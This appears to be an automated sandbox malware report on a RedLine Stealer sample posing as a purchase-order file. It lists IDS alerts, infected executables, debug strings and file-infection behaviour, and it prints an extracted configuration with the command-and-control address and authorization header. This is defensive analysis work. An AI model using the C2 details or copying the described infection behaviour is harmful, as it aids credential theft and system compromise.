Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-20T18:41:15.163662+0200	2037771	1	A Network Trojan was detected	54.244.188.177	80	192.168.2.4	49735	TCP
2024-10-20T18:42:04.887694+0200	2037771	1	A Network Trojan was detected	13.251.16.150	80	192.168.2.4	49806	TCP
2024-10-20T18:42:07.863126+0200	2037771	1	A Network Trojan was detected	44.221.84.105	80	192.168.2.4	49827	TCP
2024-10-20T18:42:39.898172+0200	2037771	1	A Network Trojan was detected	34.211.97.45	80	192.168.2.4	49988	TCP
2024-10-20T18:43:12.270333+0200	2037771	1	A Network Trojan was detected	44.213.104.86	80	192.168.2.4	50145	TCP

ET MALWARE Redline Stealer TCP CnC - Id1Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-20T18:41:15.786812+0200	2043234	1	A Network Trojan was detected	212.162.149.53	2049	192.168.2.4	49736	TCP

ET MALWARE Redline Stealer TCP CnC Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-20T18:41:15.570147+0200	2043231	1	A Network Trojan was detected	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:20.895056+0200	2043231	1	A Network Trojan was detected	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:21.348286+0200	2043231	1	A Network Trojan was detected	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:21.558226+0200	2043231	1	A Network Trojan was detected	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:21.943828+0200	2043231	1	A Network Trojan was detected	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:22.983003+0200	2043231	1	A Network Trojan was detected	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:23.384051+0200	2043231	1	A Network Trojan was detected	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:23.599940+0200	2043231	1	A Network Trojan was detected	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:23.810494+0200	2043231	1	A Network Trojan was detected	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:24.109520+0200	2043231	1	A Network Trojan was detected	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:24.115224+0200	2043231	1	A Network Trojan was detected	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:25.058580+0200	2043231	1	A Network Trojan was detected	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:25.296983+0200	2043231	1	A Network Trojan was detected	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:26.258395+0200	2043231	1	A Network Trojan was detected	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:26.514504+0200	2043231	1	A Network Trojan was detected	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:26.728327+0200	2043231	1	A Network Trojan was detected	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:26.970938+0200	2043231	1	A Network Trojan was detected	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:27.301922+0200	2043231	1	A Network Trojan was detected	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:27.520050+0200	2043231	1	A Network Trojan was detected	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:27.736451+0200	2043231	1	A Network Trojan was detected	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:27.997658+0200	2043231	1	A Network Trojan was detected	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:28.215977+0200	2043231	1	A Network Trojan was detected	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:28.436154+0200	2043231	1	A Network Trojan was detected	192.168.2.4	49736	212.162.149.53	2049	TCP
2024-10-20T18:41:28.695537+0200	2043231	1	A Network Trojan was detected	192.168.2.4	49736	212.162.149.53	2049	TCP

ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-20T18:41:21.104681+0200	2046056	1	A Network Trojan was detected	212.162.149.53	2049	192.168.2.4	49736	TCP

ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-20T18:41:15.570147+0200	2046045	1	A Network Trojan was detected	192.168.2.4	49736	212.162.149.53	2049	TCP

ETPRO MALWARE Win32/Expiro.NDO CnC Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-20T18:41:18.588797+0200	2850851	1	Malware Command and Control Activity Detected	192.168.2.4	49740	18.141.10.107	80	TCP
2024-10-20T18:42:20.239335+0200	2850851	1	Malware Command and Control Activity Detected	192.168.2.4	49895	13.251.16.150	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Avira: detection malicious, Label: W32/Infector.Gen

Found malware configuration

Source: 5.2.Native_Redline_BTC.exe.12744d08.2.raw.unpack

Malware Configuration Extractor: RedLine {"C2 url": ["212.162.149.53:2049"], "Bot Id": "FOZ", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}

Multi AV Scanner detection for submitted file

Source: RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

ReversingLabs: Detection: 50%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Joe Sandbox ML: detected

Source: RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49730 version: TLS 1.2

Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: microsofts.exe, 00000004.00000003.2465813409.0000000000960000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: svchost.exe, 00000003.00000003.1756263146.0000000005F80000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: microsofts.exe, 00000004.00000003.2535618348.0000000000950000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000004.00000003.2550990774.00000000006A0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000004.00000003.2537430293.0000000000960000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msiexec.pdb source: microsofts.exe, 00000004.00000003.1874170797.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: microsofts.exe, 00000004.00000003.2132562567.00000000062D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ssh-agent.pdb source: microsofts.exe, 00000004.00000003.1970375777.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: microsofts.exe, 00000004.00000003.2273795210.0000000006A00000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: microsofts.exe, 00000004.00000003.2273795210.0000000006A00000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdb source: microsofts.exe, 00000004.00000003.2291929777.00000000050F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msiexec.pdbGCTL source: microsofts.exe, 00000004.00000003.1874170797.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdb source: microsofts.exe, 00000004.00000003.1804702761.0000000006F10000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdbGCTL source: microsofts.exe, 00000004.00000003.2609486912.0000000000960000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000004.00000003.2600977787.0000000002200000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerceptionSimulationService.pdb source: microsofts.exe, 00000004.00000003.1889865895.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: microsofts.exe, 00000004.00000003.1766272892.00000000007DD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe, 00000000.00000003.1720096215.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe, 00000000.00000003.1720413615.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe, 00000002.00000003.1753388462.00000000041B0000.00000004.00001000.00020000.00000000.sdmp, RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe, 00000002.00000003.1752883994.0000000003D90000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: microsofts.exe, 00000004.00000003.2238300524.00000000062D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MsSense.pdbGCTL source: microsofts.exe, 00000004.00000003.1920494717.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MsSense.pdb source: microsofts.exe, 00000004.00000003.1920494717.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: microsofts.exe, 00000004.00000003.2581195964.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: microsofts.exe, 00000004.00000003.2476925381.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000004.00000003.2486068862.00000000006A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: WmiApSrv.pdbGCTL source: microsofts.exe, 00000004.00000003.2033704180.0000000006F00000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: microsofts.exe, 00000004.00000003.2327436015.0000000006A00000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb((( source: microsofts.exe, 00000004.00000003.2145606986.00000000062D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: locator.pdb source: microsofts.exe, 00000004.00000003.1905105470.0000000006350000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000004.00000003.1916280568.0000000005050000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: microsofts.exe, 00000004.00000003.1781654069.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdbCC9 source: microsofts.exe, 00000004.00000003.2291929777.00000000050F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: microsofts.exe, 00000004.00000003.2160142742.00000000062D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb source: microsofts.exe, 00000004.00000003.2145606986.00000000062D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: microsofts.exe, 00000004.00000003.2535618348.0000000000950000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000004.00000003.2550990774.00000000006A0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000004.00000003.2537430293.0000000000960000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: microsofts.exe, 00000004.00000003.2238300524.00000000062D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: microsofts.exe, 00000004.00000003.2355859647.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: microsofts.exe, 00000004.00000003.2132562567.00000000062D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdb source: microsofts.exe, 00000004.00000003.2609486912.0000000000960000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000004.00000003.2600977787.0000000002200000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb source: microsofts.exe, 00000004.00000003.1854476964.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: snmptrap.pdbGCTL source: microsofts.exe, 00000004.00000003.1940610089.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdbGCTL source: microsofts.exe, 00000004.00000003.1859196474.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerceptionSimulationService.pdbGCTL source: microsofts.exe, 00000004.00000003.1889865895.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 64BitMAPIBroker.pdb source: microsofts.exe, 00000004.00000003.2439350097.0000000000960000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerfHost.pdbGCTL source: microsofts.exe, 00000004.00000003.1896655329.0000000006340000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000004.00000003.1902674598.0000000005050000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000004.00000003.1897809499.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: microsofts.exe, 00000004.00000003.2581195964.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: microsofts.exe, 00000004.00000003.2414424613.00000000008E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: microsofts.exe, 00000004.00000003.2327436015.0000000006A00000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerfHost.pdb source: microsofts.exe, 00000004.00000003.1896655329.0000000006340000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000004.00000003.1902674598.0000000005050000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000004.00000003.1897809499.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: microsofts.exe, 00000004.00000003.2420910878.00000000008E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: microsofts.exe, 00000004.00000003.2465813409.0000000000960000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: microsofts.exe, 00000004.00000003.2355859647.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb` source: microsofts.exe, 00000004.00000003.1854476964.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: microsofts.exe, 00000004.00000003.2476925381.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000004.00000003.2486068862.00000000006A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe, 00000000.00000003.1720096215.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe, 00000000.00000003.1720413615.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe, 00000002.00000003.1753388462.00000000041B0000.00000004.00001000.00020000.00000000.sdmp, RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe, 00000002.00000003.1752883994.0000000003D90000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: WmiApSrv.pdb source: microsofts.exe, 00000004.00000003.2033704180.0000000006F00000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: TieringEngineService.pdb source: microsofts.exe, 00000004.00000003.1980310877.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: TieringEngineService.pdbGCTL source: microsofts.exe, 00000004.00000003.1980310877.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: microsofts.exe, 00000004.00000003.2363749332.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdb source: microsofts.exe, 00000004.00000003.1766237277.0000000005070000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdb source: microsofts.exe, 00000004.00000003.1859196474.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: microsofts.exe, 00000004.00000003.1781654069.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdbGCTL source: microsofts.exe, 00000004.00000003.1766237277.0000000005070000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: microsofts.exe, 00000004.00000003.1804702761.0000000006F10000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: locator.pdbGCTL source: microsofts.exe, 00000004.00000003.1905105470.0000000006350000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000004.00000003.1916280568.0000000005050000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: microsofts.exe, 00000004.00000003.2160142742.00000000062D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ssh-agent.pdbX source: microsofts.exe, 00000004.00000003.1970375777.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: snmptrap.pdb source: microsofts.exe, 00000004.00000003.1940610089.0000000006350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: microsofts.exe, 00000004.00000003.2420910878.00000000008E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: microsofts.exe, 00000004.00000003.2363749332.00000000008D0000.00000004.00001000.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\vds.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\alg.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\7-Zip\7zFM.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\snmptrap.exe	Jump to behavior
